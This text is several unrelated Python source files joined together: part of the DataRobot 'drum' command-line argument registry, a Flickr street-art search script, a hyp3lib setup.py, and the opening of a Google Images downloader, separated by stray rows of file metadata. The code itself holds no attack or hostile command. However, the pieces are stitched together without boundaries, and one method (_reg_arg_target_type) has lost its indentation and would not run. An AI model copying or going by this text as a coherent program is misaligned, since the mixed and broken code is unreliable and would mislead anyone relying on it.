                ArgumentsOptions.PARAMETER_FILE,
                default=None,
                # _is_valid_file validates the path as an argparse type hook
                type=CMRunnerArgsRegistry._is_valid_file,
                help="Model parameters stored in a JSON file",
            )
    @staticmethod
    def _reg_arg_with_error_server(*parsers):
        """Register the --with-error-server flag (serve errors if pipeline init fails)."""
        for parser in parsers:
            parser.add_argument(
                ArgumentsOptions.WITH_ERROR_SERVER,
                action="store_true",
                default=False,
                help="Start server even if pipeline initialization fails. The argument can also be provided by setting {} env var.".format(
                    ArgumentOptionsEnvVars.WITH_ERROR_SERVER
                ),
            )
    @staticmethod
    def _reg_arg_show_stacktrace(*parsers):
        """Register the --show-stacktrace flag (print tracebacks on errors)."""
        for parser in parsers:
            parser.add_argument(
                ArgumentsOptions.SHOW_STACKTRACE,
                action="store_true",
                default=False,
                help="Show stacktrace when error happens. The argument can also be provided by setting {} env var.".format(
                    ArgumentOptionsEnvVars.SHOW_STACKTRACE
                ),
            )
    @staticmethod
    def _reg_args_monitoring(*parsers):
        """Register the MLOps monitoring options (--monitor plus companion ids/settings)."""
        for parser in parsers:
            parser.add_argument(
                ArgumentsOptions.MONITOR,
                action="store_true",
                help="Monitor predictions using DataRobot MLOps. The argument can also be provided by setting {} env var. "
                "Monitoring can not be used in unstructured mode.".format(
                    ArgumentOptionsEnvVars.MONITOR
                ),
            )
            # The ids/settings below default from env vars; verify_monitoring_options()
            # later enforces that all of them are present when --monitor is used.
            parser.add_argument(
                ArgumentsOptions.DEPLOYMENT_ID,
                default=os.environ.get("DEPLOYMENT_ID", None),
                help="Deployment id to use for monitoring model predictions (env: DEPLOYMENT_ID)",
            )
            parser.add_argument(
                ArgumentsOptions.MODEL_ID,
                default=os.environ.get("MODEL_ID", None),
                help="MLOps model id to use for monitoring predictions (env: MODEL_ID)",
            )
            parser.add_argument(
                ArgumentsOptions.MONITOR_SETTINGS,
                default=os.environ.get("MONITOR_SETTINGS", None),
                help="MLOps setting to use for connecting with the MLOps Agent (env: MONITOR_SETTINGS)",
            )
    @staticmethod
    def _reg_args_deployment_config(*parsers):
        """Register the --deployment-config option (DR PPS response formatting)."""
        for parser in parsers:
            parser.add_argument(
                ArgumentsOptions.DEPLOYMENT_CONFIG,
                default=None,
                # _is_valid_file validates the path as an argparse type hook
                type=CMRunnerArgsRegistry._is_valid_file,
                help="Provide deployment configuration file to return prediction response in DR PPS format. The argument can also be provided by setting {} env var.".format(
                    ArgumentOptionsEnvVars.DEPLOYMENT_CONFIG
                ),
            )
# TODO: restrict params to be used with unstructured target type only
    @staticmethod
    def _reg_args_unstructured_mode(*parsers):
        """Register the unstructured-mode options (--query and --content-type)."""
        for parser in parsers:
            parser.add_argument(
                ArgumentsOptions.QUERY,
                default=None,
                help="Additional query params unstructured mode. (Simulates http request query params.)",
            )
            parser.add_argument(
                ArgumentsOptions.CONTENT_TYPE,
                default=None,
                help="Additional content type for unstructured mode. "
                "(Simulates http request Content-Type header, default: 'text/plain; charset=utf8')",
            )
@staticmethod
def _reg_arg_target_type(*parsers):
target_types = [e for e in TargetType.ALL.value]
for parser in parsers:
parser.add_argument(
ArgumentsOptions.TARGET_TYPE,
required=False,
choices=target_types,
default=None,
help="Target type. The argument can also be provided by setting {} env var.".format(
ArgumentOptionsEnvVars.TARGET_TYPE
),
)
    @staticmethod
    def _reg_arg_strict_validation(*parsers):
        """Register the --disable-strict-validation flag (schema issues warn, not fail)."""
        for parser in parsers:
            parser.add_argument(
                ArgumentsOptions.DISABLE_STRICT_VALIDATION,
                action="store_true",
                default=False,
                help="Disable strict schema validation and only warn if issues are found.",
            )
    @staticmethod
    def _register_subcommand_perf_test(subparsers):
        """Create, cache in _parsers and return the `perf-test` sub-parser."""
        desc = """
    Test the performance of an inference model. This is done by internally using the server
    sub command to serve the model. Then sending multiple requests to the server and
    measuring the time it takes to complete each request.
    The test is mixing several requests sizes. The idea is to get a coverage of several
    sizes, from the smallest request containing only 1 row of data, up to the largest
    request containing up to 50MB of data.
    At the end of the test, a summary of the test will be displayed. For each request size,
    the following fields will be shown:
        size: size of the requests in bytes or Megabytes.
        samples: number of samples this request size contained.
        iters: number of times this request size was sent
        min: minimum time measured for this request size (in seconds)
        avg: average time of the this request size (in seconds)
        max: maximum time measured for this request size (in seconds)
        used: amount of memory used by drum at the end of this request size (MB)
        container limit: if tests run in docker container, memory limit for it (MB)
        total physical: total amount of physical memory avail on the current machine (MB)
    """
        parser = subparsers.add_parser(
            ArgumentsOptions.PERF_TEST,
            description=desc,
            help="Run performance tests",
            # RawDescriptionHelpFormatter preserves the hand-formatted desc above
            formatter_class=argparse.RawDescriptionHelpFormatter,
        )
        CMRunnerArgsRegistry._parsers[ArgumentsOptions.PERF_TEST] = parser
        return parser
    @staticmethod
    def _register_subcommand_score(subparsers):
        """Create, cache in _parsers and return the `score` sub-parser."""
        desc = """
    Score an input file using the given model.
    """
        parser = subparsers.add_parser(
            ArgumentsOptions.SCORE, help="Run predictions in batch mode", description=desc
        )
        CMRunnerArgsRegistry._parsers[ArgumentsOptions.SCORE] = parser
        return parser
    @staticmethod
    def _register_subcommand_fit(subparsers):
        """Create, cache in _parsers and return the `fit` sub-parser."""
        parser = subparsers.add_parser(ArgumentsOptions.FIT, help="Fit your model to your data")
        CMRunnerArgsRegistry._parsers[ArgumentsOptions.FIT] = parser
        return parser
    @staticmethod
    def _register_subcommand_validation(subparsers):
        """Create, cache in _parsers and return the `validation` sub-parser."""
        desc = """
    You can validate the model on a set of various checks.
    It is highly recommended to run these checks, as they are performed in DataRobot
    before the model can be deployed.
    List of checks:
    * null values imputation: each feature of the provided dataset is set to missing
    and fed to the model.
    Example:
    > drum validation --code-dir ~/user_code_dir/ --input 10k.csv
    --positive-class-label yes --negative-class-label no
    """
        parser = subparsers.add_parser(
            ArgumentsOptions.VALIDATION,
            help="Run validation checks against the model",
            description=desc,
            formatter_class=argparse.RawDescriptionHelpFormatter,
        )
        CMRunnerArgsRegistry._parsers[ArgumentsOptions.VALIDATION] = parser
        return parser
    @staticmethod
    def _register_subcommand_server(subparsers):
        """Create, cache in _parsers and return the `server` sub-parser."""
        desc = """
    Serve the given model using REST API. A web server will be started and will use
    the {address} argument for the host and port to use.
    The drum prediction server provides the following routes.
    You may provide the environment variable URL_PREFIX.
    Note that URLs must end with /.
    A GET URL_PREFIX/ route, which checks if the server is alive.
    Example: GET http://localhost:6789/
    A POST URL_PREFIX/shutdown/ route, which shuts the server down.
    Example: POST http://localhost:6789/shutdown/
    A POST URL_PREFIX/predict/ route, which returns predictions on data.
    Example: POST http://localhost:6789/predict/
    For this /predict/ route, provide inference data
    (for the model to make predictions) as form data with a key:value pair,
    where: key = X and value = filename of the CSV that contains the inference data
    Example using curl:
    curl -X POST --form "X=@data_file.csv" localhost:6789/predict/
    """
        parser = subparsers.add_parser(
            ArgumentsOptions.SERVER,
            help="serve the model via REST APIs",
            description=desc,
            # RawDescriptionHelpFormatter preserves the hand-formatted desc above
            formatter_class=argparse.RawDescriptionHelpFormatter,
        )
        CMRunnerArgsRegistry._parsers[ArgumentsOptions.SERVER] = parser
        return parser
    @staticmethod
    def _register_subcommand_new(subparsers):
        """Create, cache in _parsers and return the `new` sub-parser."""
        parser = subparsers.add_parser(
            ArgumentsOptions.NEW,
            description="Create new model/env template",
            help="Create new model/env template",
        )
        CMRunnerArgsRegistry._parsers[ArgumentsOptions.NEW] = parser
        return parser
    @staticmethod
    def _register_subcommand_new_model(subparsers):
        """Create, cache in _parsers and return the `new model` sub-parser."""
        parser = subparsers.add_parser(
            ArgumentsOptions.NEW_MODEL, help="Create a new modeling code directory template"
        )
        CMRunnerArgsRegistry._parsers[ArgumentsOptions.NEW_MODEL] = parser
        return parser
    @staticmethod
    def _register_subcommand_push(subparsers):
        """Create, cache in _parsers and return the `push` sub-parser."""
        parser = subparsers.add_parser(
            ArgumentsOptions.PUSH,
            help="Add your modeling code into DataRobot",
            description=PUSH_HELP_TEXT,
            formatter_class=argparse.RawDescriptionHelpFormatter,
        )
        CMRunnerArgsRegistry._parsers[ArgumentsOptions.PUSH] = parser
        return parser
    @staticmethod
    def get_arg_parser():
        """Build and return the top-level `drum` argument parser with all subcommands wired up."""
        parser = argparse.ArgumentParser(description="Run user model")
        CMRunnerArgsRegistry._parsers[ArgumentsOptions.MAIN_COMMAND] = parser
        CMRunnerArgsRegistry._reg_arg_version(parser)
        subparsers = parser.add_subparsers(
            dest=CMRunnerArgsRegistry.SUBPARSER_DEST_KEYWORD, help="Commands"
        )
        # One sub-parser per drum subcommand; `new` gets its own nested subparsers.
        score_parser = CMRunnerArgsRegistry._register_subcommand_score(subparsers)
        fit_parser = CMRunnerArgsRegistry._register_subcommand_fit(subparsers)
        perf_test_parser = CMRunnerArgsRegistry._register_subcommand_perf_test(subparsers)
        validation_parser = CMRunnerArgsRegistry._register_subcommand_validation(subparsers)
        server_parser = CMRunnerArgsRegistry._register_subcommand_server(subparsers)
        new_parser = CMRunnerArgsRegistry._register_subcommand_new(subparsers)
        new_subparsers = new_parser.add_subparsers(
            dest=CMRunnerArgsRegistry.NEW_SUBPARSER_DEST_KEYWORD, help="Commands"
        )
        new_model_parser = CMRunnerArgsRegistry._register_subcommand_new_model(new_subparsers)
        push_parser = CMRunnerArgsRegistry._register_subcommand_push(subparsers)
        # Note following args are not supported for perf-test, thus set as default
        perf_test_parser.set_defaults(logging_level="warning", verbose=False)
        validation_parser.set_defaults(logging_level="warning", verbose=False)
        # Attach each shared option to exactly the subcommands that support it.
        CMRunnerArgsRegistry._reg_arg_code_dir(
            score_parser,
            perf_test_parser,
            server_parser,
            fit_parser,
            new_model_parser,
            validation_parser,
            push_parser,
        )
        CMRunnerArgsRegistry._reg_arg_verbose(
            score_parser,
            server_parser,
            fit_parser,
            new_parser,
            new_model_parser,
            push_parser,
            perf_test_parser,
        )
        CMRunnerArgsRegistry._reg_arg_input(
            score_parser, perf_test_parser, fit_parser, validation_parser
        )
        CMRunnerArgsRegistry._reg_arg_pos_neg_labels(
            score_parser, perf_test_parser, server_parser, fit_parser, validation_parser,
        )
        CMRunnerArgsRegistry._reg_arg_multiclass_labels(
            score_parser, perf_test_parser, server_parser, fit_parser, validation_parser,
        )
        CMRunnerArgsRegistry._reg_arg_logging_level(
            score_parser, server_parser, fit_parser, new_parser, new_model_parser, push_parser
        )
        CMRunnerArgsRegistry._reg_arg_docker(
            score_parser,
            perf_test_parser,
            server_parser,
            fit_parser,
            validation_parser,
            push_parser,
        )
        CMRunnerArgsRegistry._reg_arg_skip_deps_install(
            score_parser,
            perf_test_parser,
            server_parser,
            fit_parser,
            validation_parser,
            push_parser,
        )
        CMRunnerArgsRegistry._reg_arg_memory(
            score_parser,
            perf_test_parser,
            server_parser,
            fit_parser,
            validation_parser,
            push_parser,
        )
        CMRunnerArgsRegistry._reg_arg_output(score_parser, fit_parser)
        CMRunnerArgsRegistry._reg_arg_show_perf(score_parser, server_parser)
        CMRunnerArgsRegistry._reg_arg_target_feature_and_filename(fit_parser)
        CMRunnerArgsRegistry._reg_arg_weights(fit_parser)
        CMRunnerArgsRegistry._reg_arg_skip_predict(fit_parser)
        CMRunnerArgsRegistry._reg_arg_num_rows(fit_parser)
        CMRunnerArgsRegistry._reg_arg_sparse_colfile(fit_parser)
        CMRunnerArgsRegistry._reg_arg_parameter_file(fit_parser)
        CMRunnerArgsRegistry._reg_arg_samples(perf_test_parser)
        CMRunnerArgsRegistry._reg_arg_iterations(perf_test_parser)
        CMRunnerArgsRegistry._reg_arg_timeout(perf_test_parser)
        CMRunnerArgsRegistry._reg_arg_in_server(perf_test_parser)
        CMRunnerArgsRegistry._reg_arg_url(perf_test_parser)
        CMRunnerArgsRegistry._reg_arg_address(server_parser)
        CMRunnerArgsRegistry._reg_arg_production_server(server_parser, perf_test_parser)
        CMRunnerArgsRegistry._reg_arg_max_workers(server_parser, perf_test_parser)
        CMRunnerArgsRegistry._reg_arg_with_error_server(server_parser)
        CMRunnerArgsRegistry._reg_arg_language(
            new_model_parser, server_parser, score_parser, perf_test_parser, validation_parser
        )
        CMRunnerArgsRegistry._reg_arg_show_stacktrace(
            score_parser,
            perf_test_parser,
            server_parser,
            fit_parser,
            validation_parser,
            new_model_parser,
        )
        CMRunnerArgsRegistry._reg_args_monitoring(score_parser, server_parser)
        CMRunnerArgsRegistry._reg_arg_target_type(
            score_parser, perf_test_parser, server_parser, fit_parser, validation_parser
        )
        CMRunnerArgsRegistry._reg_args_unstructured_mode(
            score_parser, perf_test_parser, server_parser, validation_parser
        )
        CMRunnerArgsRegistry._reg_args_deployment_config(server_parser)
        CMRunnerArgsRegistry._reg_arg_strict_validation(fit_parser, push_parser)
        return parser
    @staticmethod
    def verify_monitoring_options(options, parser_name):
        """Validate the MLOps monitoring options after parsing.

        For `server`/`score` with --monitor: rejects unstructured target type
        and requires model id, deployment id and monitor settings, exiting the
        process with status 1 (after printing help) on any violation.
        For every other subcommand the monitoring attributes are normalized to
        disabled/None so downstream pipeline-json code can rely on them.
        """
        if options.subparser_name in [ArgumentsOptions.SERVER, ArgumentsOptions.SCORE]:
            if options.monitor:
                if options.target_type == TargetType.UNSTRUCTURED.value:
                    print("Error: MLOps monitoring can not be used in unstructured mode.")
                    exit(1)
                # Collect every required-but-missing companion option so the user
                # sees all of them at once instead of one per run.
                missing_args = []
                if options.model_id is None:
                    missing_args.append(ArgumentsOptions.MODEL_ID)
                if options.deployment_id is None:
                    missing_args.append(ArgumentsOptions.DEPLOYMENT_ID)
                if options.monitor_settings is None:
                    missing_args.append(ArgumentsOptions.MONITOR_SETTINGS)
                if len(missing_args) > 0:
                    print("\n")
                    print("Error: MLOps Monitoring requires all monitoring options to be present.")
                    print("Note: The following MLOps monitoring option(s) is/are missing:")
                    for arg in missing_args:
                        print("  {}".format(arg))
                    print("\n")
                    print("These options can also be obtained via environment variables")
                    print("\n")
                    CMRunnerArgsRegistry._parsers[parser_name].print_help()
                    exit(1)
        # Monitor options are used to fill in pipeline json,
        # so define them for the modes different from score and server
        else:
            options.monitor = False
            options.model_id = None
            options.deployment_id = None
            options.monitor_settings = None
    @staticmethod
    def verify_options(options):
        """Cross-validate parsed options per subcommand; print help/error and exit(1) on failure.

        Checks performed:
        - a subcommand (and, for `new`, a sub-mode) was actually given;
        - perf-test is not combined with the unstructured target type;
        - --production is only used when the `uwsgi` package is installed;
        - fit target arguments are consistent with the target type;
        - --skip-deps-install is only used together with --docker.
        Finishes by delegating to verify_monitoring_options().
        """
        if not options.subparser_name:
            CMRunnerArgsRegistry._parsers[ArgumentsOptions.MAIN_COMMAND].print_help()
            exit(1)
        elif options.subparser_name == ArgumentsOptions.NEW:
            if not options.new_mode:
                CMRunnerArgsRegistry._parsers[ArgumentsOptions.NEW].print_help()
                exit(1)
        elif options.subparser_name in [ArgumentsOptions.SERVER, ArgumentsOptions.PERF_TEST]:
            if (
                options.subparser_name == ArgumentsOptions.PERF_TEST
                and options.target_type == TargetType.UNSTRUCTURED.value
            ):
                print("Performance testing is not implemented for unstructured models.")
                exit(1)
            if options.production:
                if options.verbose:
                    print("Checking if uwsgi is installed...")
                # `pip show uwsgi` exits non-zero when the package is absent.
                result = subprocess.run(
                    [sys.executable, "-m", "pip", "show", "uwsgi"],
                    stdout=subprocess.PIPE,
                    stderr=subprocess.PIPE,
                )
                if result.returncode != 0:
                    print(
                        "Looks like 'uwsgi` package is missing. Don't use '{}' option when running drum server or try to install 'uwsgi'.".format(
                            ArgumentsOptions.PRODUCTION
                        )
                    )
                    print(result.stdout.decode("utf8"))
                    print(result.stderr.decode("utf8"))
                    exit(1)
                else:
                    if options.verbose:
                        print("uwsgi detected")
        elif options.subparser_name in [ArgumentsOptions.FIT]:
            # Anomaly detection has no target; any other non-transform type needs one.
            if options.target_type == TargetType.ANOMALY.value:
                if any([options.target, options.target_csv]):
                    print(
                        "Arguments '{}' and '{}' are mutually exclusive with '{}' target type.".format(
                            ArgumentsOptions.TARGET,
                            ArgumentsOptions.TARGET_CSV,
                            options.target_type,
                        )
                    )
                    exit(1)
            elif options.target_type != TargetType.TRANSFORM.value:
                if not any([options.target, options.target_csv]):
                    print(
                        "With target type '{}', target feature has to be provided using '{}' or '{}' argument.".format(
                            options.target_type,
                            ArgumentsOptions.TARGET,
                            ArgumentsOptions.TARGET_CSV,
                        )
                    )
                    exit(1)
        # getattr guards subcommands that never register --skip-deps-install.
        if getattr(options, "skip_deps_install", False) and options.docker is None:
            print(
                "Argument '{}' can only be used together with '{}'.".format(
                    ArgumentsOptions.SKIP_DEPS_INSTALL, ArgumentsOptions.DOCKER,
                )
            )
            exit(1)
        CMRunnerArgsRegistry.verify_monitoring_options(options, options.subparser_name)
| 40.861083 | 175 | 0.600555 |
94662ee45ece09b53c05d98459182de6da3e028b | 1,422 | py | Python | getgraffitiphotos.py | ryubidragonfire/bristol-streetart | ff7b1cdccdbd579e646ccc3e7dde0236775ed1b1 | [
"MIT"
] | null | null | null | getgraffitiphotos.py | ryubidragonfire/bristol-streetart | ff7b1cdccdbd579e646ccc3e7dde0236775ed1b1 | [
"MIT"
] | null | null | null | getgraffitiphotos.py | ryubidragonfire/bristol-streetart | ff7b1cdccdbd579e646ccc3e7dde0236775ed1b1 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
"""
Created on Sat Oct 8 13:05:03 2016
@author: chyam
"""
import flickr_api
from flickr_api.api import flickr
import json
def main():
    """Search Flickr for geotagged 'street art' photos and dump id/lat/lon/url to JSON."""
    # credentials to access flickr api
    initialise()
    # NOTE(review): lat/lon appear to center on Bristol, UK, with a 0.6 km radius -- confirm.
    photos_xml = flickr.photos.search(tags='street art', lat=51.452705, lon=-2.595146, radius=0.6, radius_units='km', extras='geo, url_l')
    photos_json = xmltojson(photos_xml)
    # assumes Flickr's XML maps to rsp -> photos -> photo list -- TODO confirm for empty results
    photo = photos_json['rsp']['photos']['photo']
    d={}
    dlist=[]
    for p in photo:
        d['id'] = p['@id']
        d['lon'] = p['@longitude']
        d['lat'] = p['@latitude']
        d['url'] = p['@url_l']
        # copy() so each appended record is independent of the reused dict
        dlist.append(d.copy())
    #dlist_json = json.dumps(dlist)
    with open('./photos_list.json', 'w') as f:
        json.dump(dlist, f, sort_keys = True)
    return
def xmltojson(xml_string, xml_attribs=True):
    """Parse an XML string and return it as plain JSON-compatible data.

    The dumps/loads round trip converts xmltodict's OrderedDicts into plain
    dicts/lists so callers get ordinary JSON types.

    Fixes: dropped the function-local `import json` that shadowed the
    module-level import, and the pointless `indent=4` argument (formatting is
    irrelevant to an immediately re-parsed string).
    """
    import xmltodict
    d = xmltodict.parse(xml_string, xml_attribs=xml_attribs)
    return json.loads(json.dumps(d))
def initialise():
    """Read Flickr API credentials from config.ini and register them with flickr_api."""
    # NOTE(review): SafeConfigParser comes from the Python 2 `ConfigParser` module;
    # this script would need `from configparser import ConfigParser` on Python 3.
    from ConfigParser import SafeConfigParser
    parser = SafeConfigParser()
    parser.read('config.ini')
    API_KEY = parser.get('credential', 'API_KEY');
    API_SECRET = parser.get('credential', 'API_SECRET')
    flickr_api.set_keys(api_key = API_KEY, api_secret = API_SECRET )
    return
if __name__ == '__main__':
    main()
| 26.333333 | 139 | 0.59775 |
2f1b86c72b0c75942e925713888a1e8e6452a2f6 | 3,946 | py | Python | setup.py | lidar-nevermore/hyp3-lib | bfb2487b6cbc0029eb689bc059890e71b7f60d3c | [
"BSD-3-Clause"
] | null | null | null | setup.py | lidar-nevermore/hyp3-lib | bfb2487b6cbc0029eb689bc059890e71b7f60d3c | [
"BSD-3-Clause"
] | null | null | null | setup.py | lidar-nevermore/hyp3-lib | bfb2487b6cbc0029eb689bc059890e71b7f60d3c | [
"BSD-3-Clause"
] | null | null | null | from pathlib import Path
from setuptools import find_packages, setup
readme = Path(__file__).parent / 'README.md'
setup(
name='hyp3lib',
use_scm_version=True,
description='Common library for HyP3 plugins',
long_description=readme.read_text(),
long_description_content_type='text/markdown',
url='https://github.com/ASFHyP3/hyp3-lib',
author='ASF APD/Tools Team',
author_email='uaf-asf-apd@alaska.edu',
license='BSD',
include_package_data=True,
classifiers=[
'Development Status :: 5 - Production/Stable',
'Intended Audience :: Science/Research',
'License :: OSI Approved :: BSD License',
'Natural Language :: English',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.7',
'Programming Language :: Python :: 3.8',
'Programming Language :: Python :: 3.9',
'Programming Language :: Python :: 3.10',
'Topic :: Software Development :: Libraries',
],
python_requires='>=3.7',
install_requires=[
'boto3',
'gdal',
'imageio',
'importlib_metadata',
'lxml',
'matplotlib',
'netCDF4',
'numpy',
'pillow',
'pyproj>=2',
'pyshp',
'requests',
'scipy',
'six',
'statsmodels',
'urllib3',
],
extras_require={
'develop': [
'botocore',
'flake8',
'flake8-import-order',
'flake8-blind-except',
'flake8-builtins',
'pytest',
'pytest-cov',
'pytest-console-scripts',
'responses',
]
},
packages=find_packages(),
# FIXME: this could/should be converted to python so it can be registered as an entrypoint
scripts=['scripts/GC_map_mod'],
entry_points={'console_scripts': [
'apply_wb_mask.py = hyp3lib.apply_wb_mask:main',
'byteSigmaScale.py = hyp3lib.byteSigmaScale:main',
'copy_metadata.py = hyp3lib.copy_metadata:main',
'createAmp.py = hyp3lib.createAmp:main',
'cutGeotiffsByLine.py = hyp3lib.cutGeotiffsByLine:main',
'cutGeotiffs.py = hyp3lib.cutGeotiffs:main',
'draw_polygon_on_raster.py = hyp3lib.draw_polygon_on_raster:main',
'dem2isce.py = hyp3lib.dem2isce:main',
'enh_lee_filter.py = hyp3lib.enh_lee_filter:main',
'extendDateline.py = hyp3lib.extendDateline:main',
'geotiff_lut.py = hyp3lib.geotiff_lut:main',
'get_bounding.py = hyp3lib.get_bounding:main',
'getDemFor.py = hyp3lib.getDemFor:main',
'get_asf.py = hyp3lib.get_asf:main',
'get_dem.py = hyp3lib.get_dem:main',
'get_orb.py = hyp3lib.get_orb:main',
'iscegeo2geotif.py = hyp3lib.iscegeo2geotif:main',
'make_arc_thumb.py = hyp3lib.make_arc_thumb:main',
'makeAsfBrowse.py = hyp3lib.makeAsfBrowse:main',
'makeChangeBrowse.py = hyp3lib.makeChangeBrowse:main',
'make_cogs.py = hyp3lib.make_cogs:main',
'makeColorPhase.py = hyp3lib.makeColorPhase:main',
'makeKml.py = hyp3lib.makeKml:main',
'offset_xml.py = hyp3lib.offset_xml:main',
'ps2dem.py = hyp3lib.ps2dem:main',
'raster_boundary2shape.py = hyp3lib.raster_boundary2shape:main',
'rasterMask.py = hyp3lib.rasterMask:main',
'resample_geotiff.py = hyp3lib.resample_geotiff:main',
'rtc2colordiff.py = hyp3lib.rtc2colordiff:main',
'rtc2color.py = hyp3lib.rtc2color:main',
'simplify_shapefile.py = hyp3lib.simplify_shapefile:main',
'SLC_copy_S1_fullSW.py = hyp3lib.SLC_copy_S1_fullSW:main',
'subset_geotiff_shape.py = hyp3lib.subset_geotiff_shape:main',
'tileList2shape.py = hyp3lib.tileList2shape:main',
'utm2dem.py = hyp3lib.utm2dem:main',
'verify_opod.py = hyp3lib.verify_opod:main',
]
},
zip_safe=False,
)
| 33.726496 | 94 | 0.618094 |
0c05845a6e8eebf83715ab103db202126d61bd89 | 36,827 | py | Python | google_images_download/google_images_download.py | vflanker/google-images-crawler | f6981497cce945fca116dab43a9e632f2cbe95d3 | [
"MIT"
] | null | null | null | google_images_download/google_images_download.py | vflanker/google-images-crawler | f6981497cce945fca116dab43a9e632f2cbe95d3 | [
"MIT"
] | null | null | null | google_images_download/google_images_download.py | vflanker/google-images-crawler | f6981497cce945fca116dab43a9e632f2cbe95d3 | [
"MIT"
] | null | null | null | # In[ ]:
# coding: utf-8
###### Searching and Downloading Google Images to the local disk ######
# Import Libraries
import sys
version = (3, 0)
cur_version = sys.version_info
if cur_version >= version: # If the Current Version of Python is 3.0 or above
import urllib.request
from urllib.request import Request, urlopen
from urllib.request import URLError, HTTPError
from urllib.parse import quote
import html
else: # If the Current Version of Python is 2.x
import urllib2
from urllib2 import Request, urlopen
from urllib2 import URLError, HTTPError
from urllib import quote
import time # Importing the time library to check the time of code execution
import os
import argparse
import ssl
import datetime
import json
import re
import codecs
# First pass: only look for --config_file; if present, all download jobs come
# from its JSON "Records" list instead of the command line.
config = argparse.ArgumentParser()
config.add_argument('-cf', '--config_file', help='config file name', default='', type=str, required=False)
config_file_check = config.parse_known_args()
object_check = vars(config_file_check[0])
if object_check['config_file'] != '':
    # Every record starts with all known argument keys set to None, then is
    # overlaid with the values from the JSON record.
    args_list = ["keywords","keywords_from_file","suffix_keywords","prefix_keywords","limit","format","url","single_image","output_directory","delay","color","color_type","usage_rights","size","type","time","time_range","aspect_ratio","similar_images","specific_site","print_urls","print_size","metadata","extract_metadata","socket_timeout","thumbnail","language","prefix","proxy","related_images"]
    records = []
    json_file = json.load(open(config_file_check[0].config_file))
    for record in range(0,len(json_file['Records'])):
        arguments = {}
        for i in args_list:
            arguments[i] = None
        for key, value in json_file['Records'][record].items():
            arguments[key] = value
        records.append(arguments)
    records_count = len(records)
else:
    # Taking command line arguments from users
    parser = argparse.ArgumentParser()
    parser.add_argument('-k', '--keywords', help='delimited list input', type=str, required=False)
    parser.add_argument('-kf', '--keywords_from_file', help='extract list of keywords from a text file', type=str, required=False)
    parser.add_argument('-sk', '--suffix_keywords', help='comma separated additional words added after to main keyword', type=str, required=False)
    parser.add_argument('-pk', '--prefix_keywords', help='comma separated additional words added before main keyword', type=str, required=False)
    parser.add_argument('-l', '--limit', help='delimited list input', type=str, required=False)
    parser.add_argument('-f', '--format', help='download images with specific format', type=str, required=False,
                        choices=['jpg', 'gif', 'png', 'bmp', 'svg', 'webp', 'ico'])
    parser.add_argument('-u', '--url', help='search with google image URL', type=str, required=False)
    parser.add_argument('-x', '--single_image', help='downloading a single image from URL', type=str, required=False)
    parser.add_argument('-o', '--output_directory', help='download images in a specific directory', type=str, required=False)
    parser.add_argument('-d', '--delay', help='delay in seconds to wait between downloading two images', type=str, required=False)
    parser.add_argument('-c', '--color', help='filter on color', type=str, required=False,
                        choices=['red', 'orange', 'yellow', 'green', 'teal', 'blue', 'purple', 'pink', 'white', 'gray', 'black', 'brown'])
    parser.add_argument('-ct', '--color_type', help='filter on color', type=str, required=False,
                        choices=['full-color', 'black-and-white', 'transparent'])
    parser.add_argument('-r', '--usage_rights', help='usage rights', type=str, required=False,
                        choices=['labeled-for-reuse-with-modifications','labeled-for-reuse','labeled-for-noncommercial-reuse-with-modification','labeled-for-nocommercial-reuse'])
    parser.add_argument('-s', '--size', help='image size', type=str, required=False,
                        choices=['large','medium','icon','>400*300','>640*480','>800*600','>1024*768','>2MP','>4MP','>6MP','>8MP','>10MP','>12MP','>15MP','>20MP','>40MP','>70MP'])
    parser.add_argument('-t', '--type', help='image type', type=str, required=False,
                        choices=['face','photo','clip-art','line-drawing','animated'])
    parser.add_argument('-w', '--time', help='image age', type=str, required=False,
                        choices=['past-24-hours','past-7-days'])
    parser.add_argument('-wr', '--time_range', help='time range for the age of the image. should be in the format {"time_min":"MM/DD/YYYY","time_max":"MM/DD/YYYY"}', type=str, required=False)
    parser.add_argument('-a', '--aspect_ratio', help='comma separated additional words added to keywords', type=str, required=False,
                        choices=['tall', 'square', 'wide', 'panoramic'])
    parser.add_argument('-si', '--similar_images', help='downloads images very similar to the image URL you provide', type=str, required=False)
    parser.add_argument('-ss', '--specific_site', help='downloads images that are indexed from a specific website', type=str, required=False)
    parser.add_argument('-p', '--print_urls', default=False, help="Print the URLs of the images", action="store_true")
    parser.add_argument('-ps', '--print_size', default=False, help="Print the size of the images on disk", action="store_true")
    parser.add_argument('-m', '--metadata', default=False, help="Print the metadata of the image", action="store_true")
    parser.add_argument('-e', '--extract_metadata', default=False, help="Dumps all the logs into a text file", action="store_true")
    parser.add_argument('-st', '--socket_timeout', default=False, help="Connection timeout waiting for the image to download", type=float)
    parser.add_argument('-th', '--thumbnail', default=False, help="Downloads image thumbnail along with the actual image", action="store_true")
    parser.add_argument('-la', '--language', default=False, help="Defines the language filter. The search results are automatically returned in that language", type=str, required=False,
                        choices=['Arabic','Chinese (Simplified)','Chinese (Traditional)','Czech','Danish','Dutch','English','Estonian','Finnish','French','German','Greek','Hebrew','Hungarian','Icelandic','Italian','Japanese','Korean','Latvian','Lithuanian','Norwegian','Portuguese','Polish','Romanian','Russian','Spanish','Swedish','Turkish'])
    parser.add_argument('-pr', '--prefix', default=False, help="A word that you would want to prefix in front of each image name", type=str, required=False)
    parser.add_argument('-px', '--proxy', help='specify a proxy address and port', type=str, required=False)
    parser.add_argument('-cd', '--chromedriver', help='specify the path to chromedriver executable in your local machine', type=str, required=False)
    parser.add_argument('-ri', '--related_images', default=False, help="Downloads images that are similar to the keyword provided", action="store_true")
    args = parser.parse_args()
    arguments = vars(args)
    # CLI mode always yields exactly one record (one download job).
    records = []
    records.append(arguments)
    records_count = len(records)
# Downloading entire Web Document (Raw Page Content)
def download_page(url):
"""Fetch the raw HTML of *url* using a desktop-browser User-Agent.

On Python 3: returns the response body as a string, or prints the error
(and implicitly returns None) on failure. On Python 2: falls back to
urllib2, retrying with an unverified SSL context on certificate errors,
and returns the literal string "Page Not found" on any error.
"""
version = (3, 0)
cur_version = sys.version_info
if cur_version >= version: # If the Current Version of Python is 3.0 or above
try:
headers = {}
headers['User-Agent'] = "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36"
req = urllib.request.Request(url, headers=headers)
resp = urllib.request.urlopen(req)
respData = str(resp.read())
return respData
except Exception as e:
# NOTE(review): failure path returns None here (no explicit return);
# callers should be prepared for a None page.
print(str(e))
else: # If the Current Version of Python is 2.x
try:
headers = {}
